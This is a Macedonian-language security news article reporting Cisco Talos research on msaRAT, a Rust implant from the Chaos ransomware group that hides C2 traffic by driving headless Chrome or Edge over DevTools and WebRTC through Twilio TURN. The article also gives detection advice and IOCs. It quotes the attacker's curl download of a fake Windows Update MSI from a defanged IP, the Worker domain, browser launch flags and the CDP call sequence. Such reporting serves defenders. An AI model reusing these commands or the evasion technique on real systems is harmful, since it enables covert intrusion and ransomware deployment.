Преглед на приватноста

Оваа веб-страница користи колачиња за да ви обезбеди најдобро можно корисничко искуство. Информациите за колачињата се складираат во вашиот прелистувач и извршуваат функции како препознавање кога се враќате на нашата веб-страница и им помагаат на нашите програмери да разберат кои делови од веб-страницата ви се најинтересни и најкорисни.

Строго неопходни колачиња

Строго неопходните колачиња треба да бидат овозможени во секое време за да можеме да ги зачуваме вашите поставки за колачиња.

Chaos ransomware користи msaRAT за насочување на C2-сообраќајот преку Headless Chrome и Edge

Групата Chaos ransomware го извршувала својот командно-контролен (C2) сообраќај преку самиот прелистувач на жртвата. Истражувачите од Cisco Talos во четвртокот ги објавија деталите за msaRAT, имплант напишан на програмскиот јазик Rust, кој бил пронајден на компромитирана Windows-машина пред активирањето на ransomware-от.

Имплантот никогаш не воспоставува директна излезна мрежна врска. Неговиот процес комуницира само со 127.0.0.1 (localhost) и со ништо друго. Наместо тоа, тој стартува Chrome или Edge во headless режим (без графички интерфејс) и управува со нив преку Chrome DevTools Protocol (CDP) – официјалниот API за дебагирање на прелистувачот.

Секоја C2-порака потоа се испраќа преку WebRTC data channel, кој се пренасочува преку Twilio TURN сервисот. За одбранбените системи изгледа како обичен прелистувач што комуницира со Cloudflare и Twilio, додека вистинската адреса на серверот на напаѓачот воопшто не се појавува.

Chrome ја води целата комуникација

msaRAT најпрво се обидува да го пронајде Chrome или Edge преку environment-променливите, а доколку тоа не успее, го проверува Windows Registry за Chrome. Ако не пронајде соодветен прелистувач, техниката базирана на CDP не се користи.

Кога ќе најде прелистувач, го стартува без видлив прозорец со параметарот:

  • --headless=new
  • го активира CDP преку --remote-debugging-port
  • користи посебен профил преку --user-data-dir

Од Chrome 136, Google повеќе не дозволува remote debugging врз стандардниот кориснички профил – промена воведена во март 2025 година поради злоупотреби од инфостилери кои краделе колачиња (cookies). Но msaRAT користи сопствен директориум за профил, па ова ограничување не го спречува. Анализата на Talos не покажува дека малверот воопшто го допира профилот на жртвата.

Потоа малверот го повикува /json/list/ за да добие достапна цел за дебагирање и се поврзува на добиениот WebSocket URL. Отвора нов таб, ја исклучува Content Security Policy (CSP) преку Page.setBypassCSP, регистрира пет callback функции со Runtime.addBinding и преку Runtime.evaluate вметнува JavaScript-код што е зачуван како обичен текст во .rdata секцијата на бинарната датотека.

Четири од callback-функциите:

  • msaOpen
  • msaClose
  • msaError
  • msaMessage

му помогнале на Talos да го идентификува името msaRAT. Петтата функција се вика dataAck.

WebRTC комуникација преку Cloudflare и Twilio

JavaScript-кодот презема STUN и TURN конфигурација од Cloudflare Worker на:

is-01-ast[.]ols-img-12[.]workers[.]dev

При тоа Origin и Referer HTTP-заглавјата се маскирани така што изгледаат како сообраќај што доаѓа од веб-страниците на Microsoft.

Потоа се воспоставува WebRTC peer connection, а SDP-понудата се испраќа до истиот Worker.

Одговорот пристигнува без ICE кандидати и со адреса 0.0.0.0, што оневозможува директна peer-to-peer комуникација. Поради тоа целиот WebRTC-сообраќај поминува преку Twilio relay (global.turn.twilio.com). Откако ќе се воспостави data channel, Cloudflare Worker повеќе не учествува во комуникацијата.

Двојно шифрирана комуникација

Сообраќајот е шифриран на две нивоа:

  1. WebRTC автоматски користи DTLS.
  2. Внатре во него msaRAT користи дополнителна шема базирана на ChaCha20-Poly1305, при што клучот се генерира преку ECDH размена што започнува со 0xFE handshake рамка веднаш по воспоставувањето на врската.

Извршување команди

Пристигнатите C2-команди се проследуваат до:

cmd.exe /e:ON /v:OFF /d /c <команда>

каде што се извршуваат.

Talos смета дека механизмите за редици и контрола на протокот се дизајнирани за сигурен пренос на поголеми податоци како:

  • слики од екранот,
  • датотеки,
  • други големи payload-и.

Комбинација на веќе познати техники

Ниту една од двете техники сама по себе не е нова.

  • Во август 2025 година Praetorian покажа дека TURN-инфраструктурата на платформи за видеоконференции може да се злоупотреби за целосен C2-канал.
  • Во март 2026 година Sansec откри malware што преку WebRTC data channels пренесувал украдени податоци од платежни картички, избегнувајќи HTTP-инспекција.

Новината е што msaRAT ги комбинира овие техники во Rust-имплант што управува со headless прелистувач преку CDP.

Почетниот пристап е стандарден

msaRAT се инсталира откако напаѓачот веќе има пристап до системот и пред активирањето на ransomware-от.

Talos не објаснува како е компромитирана конкретната машина.

Според досегашните активности на групата Chaos, најчесто се користат:

  • spam кампањи,
  • vishing,
  • Quick Assist,
  • RMM (Remote Monitoring and Management) алатки.

Инсталација

Имплантот се презема со една единствена curl-команда:

curl.exe https://172.86.126[.]18:443/update_ms.msi -o C:\ProgramData\update_ms.msi

Иако се користи портата 443, сообраќајот е обичен HTTP. Заштитните ѕидови што филтрираат само според бројот на портата лесно можат да го пропуштат.

MSI-пакетот се претставува како Windows Update, а на крајот од инсталацијата custom action вчитува DLL директно во меморијата.

Таа DLL е msaRAT, напишана во Rust со Tokio async runtime, која извезува функција RUN што ја повикува инсталерот.

Препораки за откривање

msaRAT е post-compromise малвер и не користи никаква ранливост во Chrome или Edge. Затоа нема безбедносна закрпа за самата техника.

Најважниот индикатор е однесувањето на процесите.

Talos препорачува да се бара:

  • Chrome или Edge стартуван од MSI-инсталер, сервис или друг неинтерактивен процес;
  • параметри --headless=new и --remote-debugging-port;
  • loopback комуникација кон локалниот debugging-порт;
  • последователен WebRTC-сообраќај.

Доколку телеметријата ги снима CDP-пораките, особено треба да се следат:

  • Runtime.addBinding
  • Runtime.evaluate

Организациите што користат легитимна browser automation или CI/CD ќе треба внимателно да ги разликуваат нормалните од злонамерните активности.

Индикатори за компромитација (IOC)

До 23 јули 2026 година, Talos не објавил hash-вредности за msaRAT.

Јавно достапните IOC се само:

  • IP-адресата што се користи за преземање на малверот;
  • Cloudflare Worker доменот.

Достапните сигнатури се:

  • ClamAV: Win.Downloader.ChaosRaas-10060321-0
  • Snort 2: 1:66839, 1:66840, 1:66841
  • Snort 3: 1:66839, 1:301587

Ограничувања на индикаторите

Овие индикатори имаат ограничена вредност.

  • workers.dev е заеднички домен што го користат сите Cloudflare Workers корисници.
  • Twilio обезбедува легитимни STUN/TURN услуги што ги користат бројни WebRTC-апликации.

Блокирањето на овие сервиси на организациско ниво може да предизвика прекин на легитимен сообраќај.

Според Talos, токму затоа Cloudflare Workers бил избран како сигнализациски механизам.

Заклучок

Извештајот ја опишува оваа техника како забележана практика, а не како масовна кампања. Не е наведено:

  • кој бил нападнатиот субјект;
  • колку организации биле погодени;
  • кога првпат се појавил msaRAT;
  • како биле обезбедени Cloudflare Worker и Twilio TURN акредитивите.

Начинот на испорака останува вообичаен:

  • curl преземање,
  • лажно Windows Update,
  • DLL вчитан од MSI.

Новината е начинот на кој потоа функционира C2-комуникацијата. Иако IP-адресите и домените лесно можат да се сменат, техниката на стартување headless Chrome или Edge преку инсталер и нивно користење како посредник за C2-комуникација е далеку потешко да се сокрие и претставува најважниот индикатор за откривање.

msaRAT бара само едно од двете – Chrome или Edge – да биде инсталирано и да има дозволен пристап до интернет, што претставува минимално барање за повеќето Windows-окружувања.

Извори:

  • The Hacker News – Chaos Ransomware Uses msaRAT to Route C2 Traffic Through Headless Chrome and Edge The Hacker News